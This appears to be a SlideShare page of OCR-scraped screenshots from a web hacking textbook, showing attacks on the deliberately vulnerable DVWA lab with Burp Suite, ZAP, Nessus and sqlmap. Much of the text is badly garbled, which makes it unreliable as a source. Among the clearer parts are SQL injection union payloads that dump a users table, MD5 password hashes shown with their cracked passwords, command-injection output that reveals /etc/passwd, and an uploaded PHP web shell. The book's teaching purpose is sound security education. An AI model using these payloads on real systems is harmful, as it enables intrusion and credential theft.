SlideShare a Scribd company logo

The basics web hacking

Albertz Ace-Red
Albertz Ace-Red

The document discusses tools and techniques for attacking websites. It covers topics like information gathering, vulnerability scanning, exploitation, and web application attacks. The goal is to educate readers about common hacking methods so they can better defend their systems.

Education
1 of 179
: 0 0 UJ * 0 z >i/) A / THE BASICSOF WEB HACKING ToolsandTechniques toAttack the Web I I, lil ,i II Ell ! a II. ii i i Josh Paul 1W
AMSTERDAM * BOSTON * HEIDELBERG * LONDON NEWYORK * OXFORD -PARIS * SAN DIEGO SAN EKANaSGO ‘SINGAPORE* SYDNEY •TOKYO ELSEVIER Synuress is ,m Imprint pf Elsevier
R[i Working together to grow libraries in asEV[FJt developing countries www.elsevier.com •www,bookaid.org
Appiicsiisns Places System
'Unsaved Document l X if/bin/fcash echo -e w-hrt -g «* jrn Vul narahl H0h Ann Tnsraller s.i'i'lnt M"in : * Save As.,,eefi ech DWVAjnstall.stÿecfic ecfic td t ichc Name: Save in folder: jurnot v + Browse for other foldersecfic rn i ecfic Character Encoding: Current Locate fUTF-8) T Line Ending: | Unis/Linux V ecfic cd / ecfic Cancel Save Applications Places System I'. 1 * Damn Vulnerable Web App (DVWAJ - Login - Mozilla Fircfox File £dtc view History Bookmarks Tools Help Damn vul neraWe Web App (DV .. f§) BE http://i?7.o.aIflogm.php HBackTtiacfc Unus Security ||Expfcut-DB V4|rcra(:l<'r'(J I]SEORG.c DV/WAy Username admin PjlUfrOM ll
M Login if the database already exists. it wiil&e cleared and the data win t* reset Backend Database: MySQL Create i Reset Database | Database has been created. Users' table was created. Data Inserted Into 'users' table. ’guestbook;' table was created Data Inserted Into 'guestbook' table. setup successful!
DWVA Security 1 Script Security SscunLy Level 1$ currently low You can aet mu security tavul to low, medium or lnÿn Ttve secufily levÿJ change* tins vuiiwafiinly lev<?i <H DYWfi, 10* _ * $L*fnit
[>.1JKOE.I SUSfl University O, 13E.247.6-4.140/ FUTURE ETUDEMTS V CUSRENTETUDEfÿTS V FAOJLTYÿTAFF V PARENTSÿ?AMI L1 DAKOTA STATE TTCMSMOUir.WE'RESETUR,
X O New Scan 5c» Trt. C**C« EcVlftlKf l(*iVjn nr D.O 3 r Ciro**
NeSSUS vuLnera bilfty scanner rs»i Htti Stwan 5*jn CM 1 SrS*.R4*utf RDiWi Ui*f* COftiÿfSton & Listing Scans + & Opbt« v E Scaji Tltki Created By Start Time v Status Mardi 23. 201313:03-11tocalhwt erncR I'M*
9 f/ localhDst check Q] AwwTre* X Daiew. Ai Ftefcrt* jft Hosts 127.0,0.1 ftnaftlodgje Base Filler tAitrtWibirrti&i © Utu-iLi 1004115/ I a D4 r 11 10 / IJ 04 U51 ij.10 op*>CIWKJl Ubunflji L«tf 5«U**y Ch«fc* © Uburtu 10 04 ITS i' E! K f II ID; 1304 Lts nrefcM regre.cmicji1 UUuiHÿ Lee*Specify Check* Uburtu 10 04 LT5/ I S.&fl 111.10/ 13 04 LTS- feeftm tUnc „cutKill U&gflUf LecatSratr ctwefcs LTbur-tu l0 04LTSr 11.04 111 lO Mi 04 LTS- : fcefcci m*w.critical y]3MniVi! L«#l5«ka% Cheski UEHJFAJ 10 04LTS; IS.04 f 11 10/ 12.04 LTS: frefca vijha...rrtIKJl IJbMnnr LocalSee!j*ty Chocks Uburfij 10 04 LTS/ 11.04 i* 11.10/ 12.0* ITS: EWHM-YH*. ..critical Ubunhii Local SaartCy Ctocki Ltauribl 10 0* LTSn!04 <ÿ 11 10 / 12.04 as; opeT*ÿ *UL..crttKai Ubuntu Lccai SecLÿfy Check! critical Ufcurftj 10 0* LTSJ111.10 / 1204 LTS/ 1210. frefe. ftflM... Ubuntu Local 5ecJTSK Checks crttfcal 10 O) LTS/1s.10 t 1204 LT$/1210 . fteta mat* . Ubunb LccaJ Secirty Checki crilkai Ubw«y 10 04 LTS/ 11.10 / 12 04 LTSr1210: fte*» ttgn Ubuntif Local SecdCy Checki RH k Faclof: C™Heal CVSS Base Score: 10.0 cvss Vector Score: CVSS&ttVN/AC LAu:N-C C'i;C A:C CVSS Temporal Vector: CV3S2#E POC.'RL OF RC.C CV5S Temporal Score; ?.B Vulneratality incoemaUon CPE: cp4j'o:cai>onieal.ubufilijJinux.1O.0J>.lu epcft eanofi*eal.ubunBu linu-jc:1 1 .04 epÿLfo.eanwMesl.ubuntu II/TUK I 1.10 epe ironltal:ytejnlij_iinu>i:12.0Jwits Ea pkrift Available: Erne Euptotla&llliy Eafrc. E*pl«toore avrulaWe Pateh Publication Date: 20 fi 207.'12 EupfotobtaWirtJi: MetawloiM Java Apples Field Bytfrcade Vender Cache Remote Code execution) Cor# impact Reference InfcrmÿUon eve: CVE-2012-1725 g/oratrzw lanÿijWSrjKjni tt»ji7=y:i jrarjpl u Y&;rff;B Lÿjÿtjkarrfj CVE-MU-ine I CvE-20T2-im I CVE-»12-|7Ti 15&1uin: wd; 53956 I 93954 I 63952 I 53951 I 53850 I 53949 I 53947 I 53946
•*a 3 **1lP + o ! 2 S + w> P 11 i 5 L.fi c& * 3 ff £ iV* I* & s “ i 1 1f I i I El ? f l * 8a i 81 i 11 ill!illr. nn r s ? ft ft ft ft ft 3 i f s
Request Proxy Response Browser (client) Web application (server)
HXl I t HartTtitV •intwnrt M CHTlffi I Cc, Inform Ukin Oothwmg - 'll WnWWtfli*J *M«VnW - 0 EtÿOlJ'iwTiMlS j! P?L* cÿe E-stafaiion - if r1.: r'.til -rr-j- A' [ t’J’, IjT ftcyvst Engineering - FIFID-R»JS o SIIIH ttv.iNj rfi MUOtf*i!itySc-irih#j> x NeLwirt Amsimort WsbAwucaltori teraiment L iti CWSV nenl lily JoHUIuelon l*W> AocfkOtJonfitrrerj R£ AFpiirnliOnS335 Wit Open Source AsiKsmtrt S**ggy/sOVUneraHlltyita m ' W .Sw*!(ÿ Wfco t; hrrpwHf1 't t*<TS(l“iajl i ' Firefox Preferences k •• a & oGeneral Tabs Content Applications Privacy Security Sync Advanced General Network update Encryption Connection Configure how firefox connects to the internet Settings...
* connection settings configure Proxies to Access the internet O No proxy O Auto detect proxy settings for this network O iise system proxy settings O Manual proxy configuration: Port: SOSO * Ea use this proxy serverfor all protocols HTTP Proxy: 127.0.0.1 SOSO *SSL Proxy: 127.0,0.1 Pÿrt: soaoi‘FTP Proxy 127.0,0.1 Port: soao rSOfikSHost: 127,0.0.1 Por[: T O SOCÿS v*- © SOCKSy5 No Proxy for Exampie; .mozilia.org. .net.rli, 192.168.1.0/24 O Automatic proxy configuration URL: Reload Help cancel OK
* bmp Mjili fur cd-HI-sn Ml.4 Wp -TiVMi IÿHIKBT m+&m iOM i&lfm (*•••- I P4»V*W «*«ÿ#( IJHMM !_ F hdrÿ n*4 Ieu4 A«TTB. !K3H>;111 **• ti-z-J. eJc W*># ncWiphp #nAnjcl>HTk pÿp •*ÿ a} »»*v<F-e** j'HJfJiP'JtrM-m 1 Wl «rv4ar .k,-4a#, -a-Ji- liTj*] m ' -ipfÿa* ' ' rtfinh" -» m__! I IMvi- feuSd F!i-r !V C St. r +pr - M!p >nJT.D.BLS Jirr.4Lfi.ij .+.«(.»*is i itu FW L rs-_i ;
v x burp suite free edition vl.4A burp intruder repeater window about target t prow I spider T f intruder [ repeater [ÿsequencer 1 decoder | comparer I control ! options | settings [aiacheck robots,<xt @ detect custom ’not found' responses * ignore links to non-ted content 0 request the root gf ell directories 0 make a non-parameterised request to each dynamic page maximum link depth: monitor burp proxy tratfk E> passively spider as you browse link depth to associate with proxy requests; 0
forms 7individuate forms by; action UHL method and fields -don't subpurt forms prompt for guidance * siutomatteall/submit using the following rules to assign parameter values; .field name hold value fwienen@example.04nn [Peter~ [wiener_ _ match * egex mail * regex first regex last * reqex surname y regex ___comp edit A remove up Peter Wienername downtier Consulting -CSltflLnjfti: regex_ addr Main Street UrfiAne-ruillA .... i » add £ set unmatched fields to; [555-5b5-Q199@exafnpte.com_ 5 iterate all values of submit fields -max submissions per term; 10
*V fiiCtlhKll 4 Grjphici # IIH«H« m offlif - ( lnHormatror.ÿHI-tnrr; VVJnenfeHlty - 0 [.ÿpti>rj[n5i,iT«U - Mvitfge EKHtiDt* . If K' l n(i) i r/j AtttM v Reverse Enflinwi ‘ J( RFlDIWi. .1. WmeraBI ry li.smffi iAfciJÿpHewion Aiietamrt CWflbow A«evjmen« gj MSVU it'ilily !ÿ!.-: 'I!'ÿ.-! ;:ÿÿ ' & W ' on : '46' W?D ApUlcaUnif Prnsirs ;j£ tuft:ÿ Dpei.Sou .e hie •, me( r We*Mintrabitity Seamen iil I, Sounrtfi video Q Syiimn T«H* J Wine *ÿ bnrpsune wasp-zap o ienwsTfcicifta Fafcnicf flepoirir -j 1Wv (P ? Mlxdineeu _ * OWASP ZAP SSL Root f A certificate ft SSL won't work if you haven't created and imported an ” OWASP 2(iP CA root certificate. Vou can create such a certificate any time in the options menu, so you do not have to create it right now. Gener... Go to options panel and create certificate now Later Mot now. but create certificate later.
3 -a bb E N “ O <3 jE or o >H- dDi H IN JC Q E ii§i'ÿ!ÿSll||slf 13ala l£L|fl t>v|UlJN K|U H > >xOÿ > V C> = ti « « -j P A +.J "*ÿ> 3 C 3 *Ut*»2»gt5H$aiI»S gtssiliesgs . I t ¥ 4 ta|St sd sMSI?t sa: =SeSii3¥ililTfgi5SÿeS! : t iffI15S3 21£ 88£S i 3V : 5ÿ£S2ÿ|iib#ga!giitea3gÿE 0 £ * -5 f 7 > r S5 c 3H t V y K M LLI UJ -li Z V T L>J<|JlO!t'|-lAM yj M " J u 3 'v i v x LU z « u i ii- _i ui LL Sfeasi fegsisass sssÿ&c =§£Eÿf = 8-*. I-* £ JO Z £ £ JC rÿi U ¥t r-r * —1 ~3- C »- tj tj i- isli=3llj«*Sasls«-igi81 i? N H S 9 ffl Ci k- TQ Offl 4 &riX-nÿ * Cl X r4 O' n Q Li Z 5 n U- T CL OJ. '--. OJ U K <V 3E JQ « H(ÿZIi.llJ££Q<v04|Ufl4l5actÿH 1 | N V V >- +' T. F* J 50 S'ff >ZE * » ZX£fZxr-oaHCUJC4,£N440ti-s.|| rr CPÿ * ffl IUl 3 £ ::ÿ i :'- i: : 1 <j?£ T S ri C l-ÿi <ru 3 3 _ 5z L I/ d. :_• “V JT g £ Ss “ I s S . u »i iSiliu 0%tK ? g i |f|,S f 5 14-1# s ! B s ts Li C o H -L £ J * f
IH Applications Places System Q - - * Untitled Session - OWASP ZAP Eile Edit View Analyse Report Tools Help L j ki W i"l 3 3 *“ l> 0 JSitesc*- Request Raw View Attack_ GETiinc GETJOC . P0£T:k |j_J dVwa Igfr vulnera " J_I http;// : at- http://saf< Active Scan sit* Active Scan node Spider site Brute Force site Port scan host r. Exclude from Ron application Delete (from view) Purge (from DB) Resends. VSew In Browser Break.., c t y 1 1 *1 Cookie: PHI DNT: 1 Content-lei [ History ™ [ Searth |BreaX Feints X|tins f*1 Scan ?) ]Spider |Brute Furte/|Pert Start ' |Fufflfrf |Output| Current Xsnj;!Site: l*7,0,0,1 UPl found during cravnl: httf U127 P P ]/itoT*r]t/rc-5:Q-D uni found but out of trawl scope: --ÿ r-r rr«rr.nr.™f™ ~ -•Vt • *V-irV» 11 -.. owaip orqulndex php,fifap_10_3Q<l,7-AJ f History 1Search |Break Points X~| Aiortÿ f*T[ Active Stÿn |Spldorÿfj j~Port Scan ' "[ FmardTTOutput| Site: 1J7.U. U. 1 T L J Current Scans:l $Et httpM17.OSKMffil,l$e4175}17mMf 1.p*ip SET Frttp:J/l 27,0,0.1l&*«m2G2375060775356264.php GEf ktpiW127,0,0,1/dWHftiii-S-10706641574067586 GET littp:,'/127.0.0.17dvA a.' mag-?s/ea*63413iJ$9217163S SET l-rttpz/yi27.0,0,1ftlvwaAncludeV3125536246617472704.php SET http;tVl27,O,0,l,rdÿ'Vrfl/liitli.id“G.'DEMS77207'jl00S7 3PE3O9340. php 404 Not Pound 404 Not Found 404 Not Found 404 Not Found 404 Not Found 404 Not Found Sms 2mG 4mi Sms 3ms tms
(SET hnp:JBa7.Q>0LÿJIdw«J]iAÿ?aa?*5W5t>3ÿ753 4Q4 Not Foynd 4m*; Current Seans " 1 vjrQ V:(T..h | Pyir.f,. _ j 4|.V|V, j 4.'; i ...S; Sj" ll-r j Brut': F 0 . , t'vH 'j'.i'i ,F i . T tier.. * at SOL ln|eitiort Fingerprint Irtg 14) _ hutpij/l27,0.0.17dvwa/intludes/DBMS/?C-S;0-D'IHjE( ISQl Injeetlon i mo-H-f pcinl in<7 Risk: 1*High Reliability: Suspkiouo Rarameter: username-admlnt password passwardit,oijin-l,oijlnfli27IfyjECTJ DtKKFttofl B ht(p:(yl27 0.0. lfl agin pnp htr p:yyl J7.di.di.1ftetup.php Jut p-lll 27.0.0.1wlnerabiliNes/fiidpage -include.php illI*SQL lfi|e(tion (4 ) •t ij - Directory Drowsing (7) aJ -Cookie set wthoot HttpOnJy fta-g <«) .i*i . Password Auteeomplel* in brwrter <?1) SQL injection may be possible. othrf inf*
* Save j j at i IJ&J i a j rÿn i j»i tLook Ini _i iool Lÿj Desktop ZAp.htmlFile Name; 3Files OfType; ASCII KTML Me £antetSave
| History j Search , Break F'ointo |4Jerts | Achve Scan "• | Spider [ Brute Force _-|Fort Scan : I Fuser j direttory-tet-Z3smai.txt j*) flfl USitfrj127,0.0.1 0% Kivvp..ii .w»v*11 uVI 1 .ri_iÿ(uJ-| ifj'iijj.!u.v;i.,'.JlJ|Uii i JI J.pi .j_‘ li IW i i iMiJVV hit pmJ7.Q.Q.L:ao/external/phplds/0,e/t*startoverage/ httpm27.0.o.ltaMcori5/ htt pm27. O.O.LiBQ/index/ hittp-:/7Li'7. 0.0,l:8Q/irr:t ructions/ ht[ p:Hi27.0.0. L:BO/login/ httpm.27. 0-0.1:e0/loqpuitr hfttps//l27.0,0.1rSQ/set urity/ httpm27. 0.0. L:80/5etup/ httpm2" 0. 0. L:80rvutnereblitie; htt p:m27.0.0. L:BOMilnerebrlitie *b ruter htt pm27. 0-0.1:8QAfljlneret..l-t14c/ctrt.' http:ffl27. 0.0. L:SQtojInerabiht1e5/e*ec/ httpm27, 0.0,1:80/Vulnereb:lities.fir htt piff],27.0.0. Li80/vulnerebilitles/iqli/ httpc//l27.0-0,1;80Milnerabililtlesftÿ|)lln<lt htt pm27. o_o, L:OOtailnerebilrt1* -voplorid r htt pm27. 0.0. L;80A/uinereb;hties/viewhelp.pbp htt pm27. 0.0. L;80/vulnerabilitle sMeÿsource.php htt pm2 7. 0.0. L:SOMjIn erebditle c.rvi ew_sour<eÿall php httpM27.0,0d;:SOMiJtrwrabflltlestes jt htt p:/ÿ27.0.0.1;80/YiJlneratgtj#5/i<ss_5y 200 OK 200 OK 302 Found 302 Found 200 Ok 302 Found 302 Found 200 Ok 200 Ok 302 Found 302 Found 302 Found 302 Found 302 Found 302 Found 302 Found 302 Found 302 Found 302 Found 302 Found 302 Found Current
Active scanning wnard Actively sc jpi nm tuple items Vou have selected 71 items for active scanning Before commuing you can use (He titleJSSslow to remove certam ateaones of Hems. let make yo ur scan mug more ta rgetted and efficlent t. remove duplicate items isamÿ 'jRLand parameters) [2 nems| . ] remove Hems already scanned (same URL attfjparamotars) [35 items) LJ remove out-of-scope Hems [22 Hems) ? remove items AITII media responses [0* items) Q remove items Aim the foitoAmjextensions [0 Items] is gitjpg.pnp.e5s Note Seme o< irto solected items do not yet hav* responsos it you tnoose to remove items mAh mefl ia responses some of these Hems may be te rupee d from me scan when their responses ha*e been analysed. cancel next
I (?) burp suite professional vl2 burp intruder r-e-p =ati r window help target piunr ' spider-!' scanner [ intruder ' repealei tosiJte~f scan queue } Iwoscanrung | options ] sequencer ! decoder ! comparer [ corruns ' alerts j1 issues requests errorspair .....3H& . _ ] L 'V cft-i'p Jf**. complete 5% compete 2 T 5ÿ4 complete Jcomplete complete B jia% tompi4te_ B 55%-:omp?tte 1 Tiniibe-d fl Insertion points is ' I i*osl ________ J_ibibsJSwwr.mv... ftontacisfilSifDefaumspic hrtcpp tfoww my fcgntiiclsf1OMlOpfiClN 8>px 13 [Mpts>hww.rnr-. ItMbdiflOUQeau&MjHC htpt jrwwin mv I'crediicardsii.'Default asps _jiniHaa'Pwwwmv... rompnnwasnfPafaiHtasjM 6 IllllpsJlftSfflMrJnT... 'femplOpeasrUDefault asp* https JJWWW m> diiefschangeti ffEMsufl asp1 'ÿ I'l i. Ill, ..-v <ÿ' 11 -tn I T-'O..-liu 1 iif 4 rltpi -'Miti nn inviss.'!.1 j10 __https m, rprefsnrDvfauil.aspt 11 blips ffwww my. . Iprels'l ' Defaull.SSpic 1: hEPS 'ÿ'i.j.-j. m, '50 jr( hr I lOÿOMt J cp Mps:fftywwjmv... fsearchfl3JlefaullLas(w httpjJl'r.v.'w my fsearc hf1 1341 129 114 IS ”6 7 i 1Jh 7 125 1C 131 128 If ic: s 134 5 complete _ WillUlJ_ 1 13 14 waiting
lean 26' j 1 nmf |fmiiihtd j .my4patDrÿfkigi n/102/Defeurtnihx wsues | basg (aflutist | 6as» response |_ O SQL injection ashtsorj [ requestl [ resportsei j request? f response? | ft SQL injection Issue Seventy High Confidence Certain Hast Path SQL injertion https:fhnim.myapp.com .‘lflgili'IOZ'TJeftiiJt.iiishi; Issue detail The username parameter appears to be vulnerable to SQL intention attacks A suigj; fixate was submitted lei the username parameter, and a database error message was returned Two smÿe quote? weet then sybmnted and the error message disappeared You should review the contents of the error message, and the application's handing of other input, to confirm whether a vuinerabihty LS pr«en1 The database appears la be Microsoft SQL Server
(ÿ) burp mils- prdftiikinal vL2 burp intruder reefer window help spiderÿ] scanner Intruder | repeater sequencer decoder f comparer comms alertstarget ' prosy results live scanning j_op1ionsscan queue ? https ;'www iTryapp.com <ÿ OSOL injection [4| O KTTP header Injection f O Cross-site scripting (reflected!) S') O ''searchil fPeTaurt asp* lSearchTerm parameter) OisearttiMMMauHaspxjSeafciiTami parameterÿ ? LDAP Injection Open redirection Password Geld with autocomplete enabled X SSL tooktewrtlTOut secure flag set X Cookie without HttpOnly flag set >ÿ x Cacheable HTTPS response ji 0] X KTML does not spetrty charset |2] i / o- i admin *- O toniacts credrtcards i derautt.html *- ? employees *- X fileenchange news o- 6- «- O profs v O search :'t O 12 advisory request responsei' O Default aspx 0 Cross-site scripting {reflected} issue Severity. Confidence Certain Host Path Cross-site ftcripting (ioileded| High https: wrtw.myapp.com Sexdi 12itMaub.aspx
Welcome to Damn Vulnerable Web AppfHunt Dmn Vulnerable App (OVWA1 * PHP.'My&QL we4> rrwi is linmn vuinMflHe lie main gwj*s am to N an ,1 a tor joeun'y pmtwsiorKiti Is ;«i thf/ir $Ki s and loo1- in a legal orwrcnmonl. tayÿ web devi*fl(Kiri MKIflf r«JCif.1aixJ Iny (iHJCessw Of Securing wots aÿlienLkitij. Stfid nirj |i»ebi>C!i.:slLxiiniK lo icadvlc.nn vioh appiical o« security in a TilWIT room env.rcrunenl Instructions Setup WARNING!Brato Force Command Execution m+ DJtrvn VJnwmvo W» App is damn vuirHHiWe! Donot upload it toyotf hosting provider's pgplie html Tokfef Of any internet rating web server as it Mill be compromised Wo recommend or J.-, ilcvu IVJ and Instating onto 3 local machine inside your LAN wfwrh Is used soloty for losing. Disclaimer CSRF File Inclusion SQL Injection w* do not ts*o iiwpofisiW.iy fv tho wjy .n Mh«;h (my ono uses this epputtfitn we have mado the purpose* of the appdcaiion clear and it should not ho used ma&ciou&ly. We Nave given ivaimngs and taken measures to prevent users from install- ng QWVA on 1o tire A1*!smm |[ your wo* senior is compnom -s<!d v ia an installation at OVWA it Is not our responseHty it is TJv? respccisIDHity of !ho personis wm uploaded and installed It General Instructions SQL Injection (Blind) Upload I IX5S M'tLl-J XSS stored The ndp puHon allon* you Ii> vie* rttsftips for each v ulnoratrlily and for each son jfly levin on thou lospective P*3«tDVWJl Security PHPlnlO About Logout
Vulnerability: SQL injection User ID; | Sutunil ID: Rellk' or 'a' »’a First name: admin Surname; admin ID: Rellk1 or 'a" -'a First name: Gordon Surname: Brown ID; Rellk' or "a" ='a First name: ttack Surname; He ID: Rellk- or First name: Pablo Surname: Picasso ‘a- -a ID: Rellk' or ‘o' «'a First name: Bob Surname: Smith
v x burp suite free edition v1.4.01A burp intruder repeater window about target Intruderscannerproxy spider repeater sequencer 11 intercept options | history 1 request to http;//l 27.0,0.1:80 forward drop intercept is on action raw j params j headers ' hex GET request to /vulnerabilities/sqli/ valuetype name Rellk%27+or+%27a%2?%3D%27aURL id Submit SubmitURL PHPSESSID iTi7cOuorvt8mBsgdd[bv5o|4ue2cookie cookie lowsecurity
User ID: | Suborn j ID: Rellk* DT l-l union select null, database!) 4 First name: admin Surname: admin ID: Rellk' or 1=1 union select null, database!) a First name: Gordon Surname: Hr own ID: Rellk* or 1=1 union select null, database!) # First name; Hack Surname: Me ID: Rellk* of 1-1 union select null, database!) H First name: Pablo Surname: Picasso ID: Rellk* or 1=1 union select null, database!) * First name: Bob Surname: Smith &ID: Rellk* or First name; Surname: dvwa on select null, database!) # ID: Rellk* and l-l union select null, table name from information schema -tables First name: Surname: guestbook C? * ID: Rellk1 and First name: Surname: users n select null, table name from information schema . tables ID: Rellk* and 1=1 union select null, table name from information schema .tables First name: Surname: columns priu ID: Rellk' and 1=1 union select null, tahle name from information schema , tables First name: Surname: db # M ID: Rellk* and 1=1 union select null, table name from information schema. tables First name; Surname: event #
UseT ID: Submit TO: Rell*' and First name: Surname: users user td 1=1 union select null, concat (table name , 0x0a.column name l TO: Ret Ik J and First name: Surname: users first name 1-1 union select null, coneat f table name, 0x0a,column name) ID: Rellk' and First name: surname: users last name 1-1 union select null, concat ( table nane, GxDa, column name) 10: KellkÿAd r : I : user l-l union select null, concati table name fextta, column name I 10: Rellk' arÿÿi-1 union select null, concatltable name, Gx8a, column name) Surname passwoi ID: Rellk' and 1-1 union select null, concat (table nam0rGxflap column name I First name: Surname: users avatar
User ID: |_5ubmlt ID: Rel lk ' ami 1-1 union select First name: Surname: admin t bf4dcc3bbaa7G5d&ld03?7debGB7cf99 jftcaU user.exBa. password) from users st ID: ftellk' and 1-1 union select null, concatl user.GxGa. password) from users 2 First name: Surname: gordonb Cr993lBC423cb3Bdbf2f.08b3t.7&9;72ee3 ID: Rellk' and 1-1 union select null, coocaf loser, G-xOa, password) from users 2 First name: Surname?: 1337 3d3533d75ae2c3966d7eed4fcc69316b ID: Rellk' end 1-1 union select null, concat (user ,e-s5a, password) from users 2 First name: Surname: pablo ()d1a7d B9f b bbe4&t ade3de5cJ1e9e9b7 ID: Rellk* <ind 1-1 union select null, cculCStluSer , 9x03, password) from- users M First name; Surname: smithy bf 4dcc3bbaa76bd6ld3327[]|[?&BB2ef99
A v v ‘unsaved Document l -gedit file Edit View Search Tools Documents Help Save W UndoOpen T * ‘Unsaved Document 1 X adnvi n:5f4dtc3b5aa765d6ld3327debfl02c f 99 go rdonbte99a lBt42B£b38d5U6OB5367B92:je03 1337:8d3533d75ae2c3966d7e6d4f cc69216b pablo:ad18?d G9f5hbe46tade3de5171e9e9b7 smi thy:5f4dcC3b5aa765d6Ld8327deb362t f 99j Plain Text T Tab Width: ST In 5, Col 40 INS
v x burp suite free edition vl.4.01 burp intruder repeater window .about target j proxy j' spider [' s | intercept 1'intruder |f repeater f sequencer decoder 1 comparer ]' optiorcanne options 1 history request to http:tfl2".0.0.1:80 forward drop intercept is on action if parents [ header? | hexraw GET vulne Lain ilit ies/3C|li/?id=l (Submit*Slavic HTTP i.l 8ost: 127.d,0.1 tisec-Ayent: frillla/5.0 tXllf LlmUf ±£QCt tv:ia.Q.2' Geefco/QOIOGIOI Ficetax/10.0.2 Accept ; text /html , AIP-I)1 icat im/xhtbl-Kadl, app1icat ion 'Knilrrc[_0. &. */ *;<[_0 ,e Accept-Langtiaÿe: en-113. en; q=0. 5 Accept-Encoding: deflate Fcoxy-oonntccion: lceep-|ilive P-eCfter ; http:f l137 ,a.D. 1/vwlnetabi A ities/flcjii/7iti“2 Cookie: PHPSESSlDMDc IrkSvqi-lsBkkqacueoSSf I:L7; security*!-,. 1 FIS;48:35] (INFQl the back-end DBMS IS MySQL [18:48:35] flMFO] fetching banner web server operating system: Linux ubuntu 18.64 {Lucid Lynx) web application technology; PUP 5.3,2. Apache 2,2.14 back-end DBMS operating system: Linux Ubuntu back-end DBMS: MySQL 5.0 banner; '5.1,41- 3ubuntul2 , lGt"
E18:48:35] f INFO]: fetching cur 'ent database current database; 'dvwa' .1] ft] IN] [i ft r " "ql r tTtT1] [19:02:20] f TNFO ] fetching columns for table users' on database 'dvwa' Database; dvwa Table: users [6 columns] + | Column I Type back *ÿ + va rctiar(76) varcharUS] varetiar(15) varctiar(32) varcbar(15} int (6} avatar first name last name password user userid +
[19:65:58) [INFO) postprocessing table dump Database: dvwa Table: users [5 entries] | password | user user id 5f4dce3b5aa765d6lde327deb832tf99 (password) | admin e99a1Bc42Beb38d5f269853678922e93 ( abC123) Bd3533d75ae2c3966d7eed4fcc692i6b (Charley) edl07de9f5bbe4Gcade3de5c71e9e9b7 (letmein) 5f4dcc3b5aa765d61d8327deb8S3&f« (pÿWd) L I gordonb | 2 I 1337 1 3 r1
Vulnerability: Command Execution Ping for FREE Enter an IP address below I’lHG 127.0.0.1 <t!!?.0.(). 1> 1 0J J bytes of data. 64 bytes from 127,0,0,1: ur.p seq-1 ltl-64 tLireÿ0.050 ms 64 bytes from 127.0,0.1; nip spq =3 ttl-64 nme=r{i.96fi ns 64 bytes from 177.9.6.1: itmp seq-li 11 1. -Ci 4 t J irve-B.95? s. 127.0,0.1 ping statistics --- 3 packets transmitted. 3 received, packet Loss, time JS&lms rtt min/avg/fliax/mdev - e.Obzyo. 060/0.066/9.me ms
Ping for FREE Enler an IP address Wow Sut-.mil PING 127.(3.5.1 (127.13.0, l> 5&<84) bytes of data. bytes from! 127.6.6.1: icmp soq-1 ttl-Q4 time-6.642 ms 64 bytes freir 127.6,0.1: icirp seq,-2 tt-6-l tifne-B.G44 ms 64 bytes from 127.0.0.1: icmp teq-3 ttl-64 timc-B.B32 ms **- 127.0.6.1 piny statistics 3 packets transmitted, 3 received. Bit packet loss, iifliu l99Bms rt t *iiri/avy/itiex/:ndev - 0.03270.019/0, 044/0.007 ms help index.php source Ping for FREE Enter an IP address below; submit PING 127,0.6.1 (127.0.0.1) 56(3-1) bytes of data, 6.1 bytes from 127.3.G.L: icmp seq=l ttl=64 time-0. 040 ns 64 bytes from 127,0.0. l: icmp seg-2 ttl-64 time=e.647 ms 64 bytes from 127.0.0.1: icmp seq-3 ttl-64 t ime=G.039 ms — 127.0.0.1 ping statistics —3 packets transmitted, 3 received, 0% packet loss, time 1999ms rtt min/avg/itiax/mdev = 9.03970.042/0.047/0.003 ms root :x :0:G: root:/ root : /bin/basb daemon :x:1:1:daemon:/usr/sbin 1 /bin/$h bin:x :2:2: bin :/bin:/bin/sh sys:x :3:3:sys:/dev:/bin/sb sync:x :4:GS534:sync;/bin : /bin/sync games:x :5:68:games :/usr/games: /bin/sb man :x :6 :12:maru/var/cache/roan: /bin/s h Ip :x:7:7:lp:/var/spoot/lpd:/bin/sh mail :x :3:S:mail:/var/mail:/bin/sfr news:x :9:9:news:/var/spool/news ; /bin/ sh uucp; x ; 10:13:uutp: /var/spool/uucp: /bin/sh proxy : x:13:13: proxy:/bin: /bin/sh www- data:x:33:33:www-data: /var/ www: /bin/sh backup :x:34:34 ; backup: /var/backups: / bin/sh
Vulnerability: File Uploa & H«III Choosy Afl image Ip upfeaij SeLuJ) 9lOwÿ . UploadBlUlt FMC4 Comm.-no ExotuUon x File Upload CSRF i . rootFile Inclusion SOL injection 5CL liifrcrign (guild) Places Search O Potently Used r Sire ModifiedName is' DCSfcTQp 07/10/2012 Upload SOOworet-paHwonds.txt DW/A install.*h aYvua_users.txt . j tocaUiQ&t-chMk.nfc** w Sheil_y(J_7.php 3.4 KB 07/11/2012 2.7 KB 07/10/2012 12 bytes 07/11/2012 407.4 K0 07/09/2012 17.1KB 03/17/2007 JXSS foUcctfd r n»t XSS slerctl 1 113 Desktop File System _floppy DoveJOVWA S«y rhey P HP inlo About J if root@bt: / File Edit View Terminal Help rootÿljL:/'# find / -name Shell yfl 7.php /root/SheUjv0_7.php /v3r/www/hackabWt/ploads/SheU v9 7, php /tmp/VMwa reDnD/da6c24a6/Shell vij_7, php rootÿbt : /# ft
Applications Places System n v n Command Shell -127.0.0.1' Mozllla Firefox file £dd View History Book marks Toofs Help +, Command SheJI -127.0.0.1 §. : . . 127.0.0.1 Mds/Stieii_v0_7.php * < giaCkTraCk Linux ||Offersive Setun ty Ex pi011 DB Airerock ng jcm i-a FU |[EHCirtt camnuHl) [UplMdiBe] [Ehingt tUftctwy) [FBehmumr] [Create Fite] Quick Commands ;i p i Ocarhittn B »i I* *Oct' kHcrv Can 1function? Ctt stiver into jT] I V j j n Read /etc/piHwd hr-litiH!, Open p*rti Running! prtKeite t j; jl! i T* 1 i i Readme mCommand hlsto sixflhetft .1FT [r] ,i M [rl jJ'J [L ft] [-1 /i IL-H [l * [ÿIill rIT-I m [VI [ÿ_ 1 r-i1, [ÿÿj1. About AJax/PHP Command Shell try InsnftSt Vwmn 0 7ft / Y*rfwYrnJ njc n tfcrt / y phud i/
